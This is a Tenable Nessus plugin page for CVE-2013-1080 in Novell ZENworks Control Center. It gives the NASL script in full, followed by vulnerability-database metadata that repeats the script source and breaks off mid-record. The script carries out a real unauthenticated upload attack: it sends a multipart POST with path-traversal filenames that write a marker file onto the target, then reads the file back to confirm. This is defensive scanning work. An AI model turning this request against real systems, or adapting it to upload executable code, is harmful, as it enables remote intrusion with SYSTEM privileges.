Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)
2013-06-18T00:00:00
ID NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL Type nessus Reporter This script is Copyright (C) 2013-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
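The installed version of Novell ZENworks Control Center has a flaw with
authentication checking on '/zenworks/jsp/index.jsp' that can allow a
remote, unauthenticated attacker to upload arbitrary files and execute
them with SYSTEM privileges. Nessus has exploited this vulnerability to
upload a file to the '/zenworks/css' directory.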
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: when the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script stops at exit(0);
# none of the network code further down runs in that mode.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(66914);
script_version("1.7");
script_cvs_date("Date: 2018/11/15 20:50:18");
# External identifiers for the flaw this check covers.
script_cve_id("CVE-2013-1080");
script_bugtraq_id(58668);
script_name(english:"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)");
script_summary(english:"Tries to upload file");
script_set_attribute(attribute:"synopsis", value:"The remote host is affected by a remote code execution vulnerability.");
# The description states plainly that the check itself writes a file to the
# target's '/zenworks/css' directory, i.e. a positive result leaves an
# artifact on the scanned host.
script_set_attribute(attribute:"description", value:
"The installed version of Novell ZENworks Control Center has a flaw with
authentication checking on '/zenworks/jsp/index.jsp' that can allow a
remote, unauthenticated attacker to upload arbitrary files and execute
them with SYSTEM privileges. Nessus has exploited this vulnerability to
upload a file to the '/zenworks/css' directory."
);
script_set_attribute(attribute:"see_also", value:"https://support.microfocus.com/kb/doc.php?id=7011812");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-049/");
# Remediation text shown to the operator in the scan report.
script_set_attribute(attribute:"solution", value:
"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a
Monthly Update 1 for 11.2.3 installs.");
# CVSS v2 base vector: network-reachable, low complexity, no authentication,
# complete impact on confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
# CVSS v2 temporal vector: functional exploit, official fix, confirmed report.
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# Exploit-availability flags; useful for prioritising remediation, since they
# record that public and commercial exploit frameworks cover this flaw.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Novell ZENworks Configuration Management 11 SP2 File Upload");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Novell ZENworks Configuration Management Remote Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
# Timeline: the patch date recorded here precedes the disclosure date by a day.
script_set_attribute(attribute:"vuln_publication_date", value:"2013/03/22");
script_set_attribute(attribute:"patch_publication_date", value:"2013/03/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/06/18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:novell:zenworks_configuration_management");
# Marks findings from this plugin as confirmed by active exploitation rather
# than inferred from a version banner.
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
# Intrusive category: the check modifies the target (it writes a file).
# NOTE(review): scan policies with safe checks enabled typically skip this
# category - confirm against the scanner policy before relying on coverage.
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
# Prerequisites: presumably os_fingerprint.nasl supplies the "Host/OS" KB item
# read later and the detect plugin sets the required KB key - verify against
# those plugins.
script_dependencies("os_fingerprint.nasl", "novell_zenworks_control_center_detect.nasl");
script_require_ports("Services/www", 443);
script_require_keys("www/zenworks_control_center");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
# Resolve the web port (443 unless the KB says otherwise) and require that a
# ZENworks Control Center install was recorded for it; exit_on_fail is set on
# the lookup, so the script is expected to stop here when none is known.
port = get_http_port(default:443);

install = get_install_from_kb(
  appname      : "zenworks_control_center",
  port         : port,
  exit_on_fail : TRUE
);

# Boundary string for the multipart/form-data body built later.
boundary = '----------Nessus';

# Relative paths the check will try as the upload destination prefix.
# Single-quoted NASL strings interpret escapes, so '\\' is one backslash.
win_css     = '..\\webapps\\zenworks\\css\\';
unix_css_bs = '..\\..\\opt\\novell\\zenworks\\share\\tomcat\\webapps\\css\\';
unix_css_fs = '../../opt/novell/zenworks/share/tomcat/webapps/css/';

# Choose the candidate list. With no OS fingerprint, or when the operator
# asked for paranoid reporting (report_paranoia >= 2), every candidate is
# tried; otherwise only those matching the fingerprinted OS family.
os = get_kb_item("Host/OS");
if (!os || report_paranoia >= 2)
  traversals = make_list(win_css, unix_css_bs, unix_css_fs);
else if ("Windows" >< os)
  traversals = make_list(win_css);
else
  traversals = make_list(unix_css_bs, unix_css_fs);

# Marker file: fixed, recognisable content under a random 8-character name
# ending in '_nessus.txt', so the artifact can be attributed to this plugin
# during post-scan cleanup.
msg   = 'file created by nessus : ' + SCRIPT_NAME;
fname = rand_str(length:8) + '_nessus.txt';

# Set to TRUE only once the marker has been read back from the server.
vuln = FALSE;
# Try each candidate path prefix in turn: upload the marker file without
# authenticating, then read it back from '/zenworks/css/'. The loop stops at
# the first prefix for which the read-back content matches.
#
# NOTE(review): nothing in this script removes the marker after a successful
# upload, so a positive result leaves '<random>_nessus.txt' in the css
# directory; it should be deleted from the host once the finding is triaged.
# On the server side, the observable trace of this check is a POST to
# '/zenworks/jsp/index.jsp?pageid=newDocumentWizard' followed by a GET for a
# previously unseen file under '/zenworks/css/'.
foreach traversal (traversals)
{
# Single-part multipart/form-data body: the part's filename is the path
# prefix plus the marker name, and its content is the marker text.
postdata =
'--' + boundary + '\r\n' +
'Content-Disposition: form-data; name="mainPage:_ctrl21a:FindFile:filePathTextBox"; '+
'filename="' + traversal + fname + '"' + '\r\n' +
'Content-Type: text/plain\r\n' +
'\r\n' +
msg +
'\r\n' +
'--' + boundary + '--' + '\r\n';
# Host header value: prefer the HTTP/1.1 hostname stored in the KB for this
# port, then the 'sc.hostname.<ip>' preference, then the resolved host name.
# NOTE(review): this does not depend on `traversal`, so it is recomputed
# identically on every iteration.
host = NULL;
hn = get_kb_item('www/'+port+'/http11_hostname');
if (! isnull(hn))
host = hn;
else
{
host = get_preference('sc.hostname.' + get_host_ip());
if (strlen(host) == 0) host = get_host_name();
}
if( isnull(host)) exit(1, 'Error getting host name.');
# Hand-built request array: '$'-prefixed keys carry the request line and
# body, the remaining keys are sent as headers.
rq = make_array();
rq['$data'] = postdata;
rq['$method'] = 'POST';
rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';
rq['$port'] = port;
rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';
rq['Content-Length'] = strlen(postdata);
rq['Host'] = host;
rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;
# nb: the server requires the data to be sent in this exact manner,
# or the exploit won't work. I couldn't get this to work using
# http_send_recv3() because it calls http_mk_req() which adds extra
# headers that cause the exploit to fail
w = http_send_recv_req(port: port, req: rq,
exit_on_fail: TRUE);
# A status line without "302" is treated as "upload not accepted for this
# prefix"; move on to the next candidate.
if ("302" >!< w[0]) continue;
# Keep the exact request that was sent so it can be quoted in the report.
exploit_req = http_last_sent_request();
# Confirmation step: fetch the marker from the web-served css directory.
res = http_send_recv3(method:"GET",
item:"/zenworks/css/" + fname,
port:port,
exit_on_fail:TRUE);
# Only an exact match of the response body against the marker text counts,
# which avoids false positives from catch-all or error pages.
if (res[2] == msg)
{
vuln = TRUE;
break;
}
}
# Report the outcome. A host where no candidate path produced a readable
# marker is audited as not affected; otherwise a finding is raised, with the
# request that was sent and the URL of the uploaded marker attached when
# report verbosity allows it.
if (!vuln)
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "Novell ZENworks Control Center", build_url(port:port, qs:'/'));
}
else if (report_verbosity > 0)
{
  # Separator line printed above and below the quoted request.
  snip_line = crap(data:"-", length:30) + ' snip ' + crap(data:"-", length:30);

  # The URL in the report tells the operator which file to remove from the
  # server after the finding has been reviewed.
  marker_url = build_url(port:port, qs:'/zenworks/css/' + fname);

  report =
    '\n Nessus was able to upload a file to the server with the following' +
    '\n request :\n\n' +
    snip_line + '\n' +
    chomp(exploit_req) + '\n' +
    snip_line + '\n\n' +
    '\n It can be accessed here: ' + marker_url + '\n';

  security_hole(port:port, extra:report);
}
else
{
  # Quiet mode: raise the finding without the supporting detail.
  security_hole(port);
}
{"id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "bulletinFamily": "scanner", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "description": "The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on ", "published": "2013-06-18T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/66914", "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "cvelist": ["CVE-2013-1080"], "type": "nessus", "lastseen": "2019-11-01T03:00:24", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on ", "edition": 10, "enchantments": {"dependencies": {"modified": "2019-10-28T20:47:17", "references": [{"idList": ["CVE-2013-1080"], "type": "cve"}, {"idList": ["NOVELL_ZCC_RCE.NASL"], "type": "nessus"}, {"idList": ["E-318"], "type": "dsquare"}, {"idList": ["SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA", "SAINT:94F8E6CAEFFA04E9B0850B791E66098C"], "type": "saint"}, {"idList": ["ZDI-13-049"], "type": "zdi"}, {"idList": ["1337DAY-ID-20599"], "type": "zdt"}, {"idList": ["D2SEC_ZCM2"], "type": "d2"}, {"idList": ["PACKETSTORM:121042"], "type": "packetstorm"}, {"idList": ["EDB-ID:24938"], "type": "exploitdb"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD"], "type": "metasploit"}]}, "score": {"modified": "2019-10-28T20:47:17", "value": 8.3, "vector": "NONE"}}, "hash": 
"e01f442fa54bbbe31e1c129ac317899727660fe55222d751c48585deb5b1fb65", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "6a95d4214f12750e340ba0b31813bc2f", "key": "href"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "e2b2244f868feb1714d67ab299c5131c", "key": "description"}, {"hash": "de435e0277c005ba6f706cbc59d9eef7", "key": "sourceData"}, {"hash": "5be30e03e787d644feaf8f202e413723", "key": "references"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "528cea5b87bf77107bd9f05291bbffe5", "key": "reporter"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2019-10-28T20:47:17", "modified": "2019-10-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "reporter": "This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to 
upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 
'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", 
build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified"], "edition": 10, "lastseen": "2019-10-28T20:47:17"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-01-16T20:16:12", "references": [{"idList": ["CVE-2013-1080"], "type": "cve"}, {"idList": ["NOVELL_ZCC_RCE.NASL"], "type": "nessus"}, {"idList": ["E-318"], "type": "dsquare"}, {"idList": ["SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA", "SAINT:94F8E6CAEFFA04E9B0850B791E66098C"], "type": "saint"}, {"idList": ["ZDI-13-049"], "type": "zdi"}, {"idList": ["1337DAY-ID-20599"], "type": "zdt"}, {"idList": ["D2SEC_ZCM2"], "type": "d2"}, {"idList": ["PACKETSTORM:121042"], "type": "packetstorm"}, {"idList": ["EDB-ID:24938"], "type": "exploitdb"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD"], "type": "metasploit"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "bcd084a936cf869854b2c3e1663c141d29a1e7020f578b59a6d9d530e4340327", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "3a524fd6a9dc6004ee89240118dbcb9e", "key": "description"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": 
"9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "de435e0277c005ba6f706cbc59d9eef7", "key": "sourceData"}, {"hash": "5be30e03e787d644feaf8f202e413723", "key": "references"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2019-01-16T20:16:12", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["https://www.zerodayinitiative.com/advisories/ZDI-13-049/", "https://support.microfocus.com/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload 
arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n 
script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' 
+ get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 8, "lastseen": "2019-01-16T20:16:12"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": 
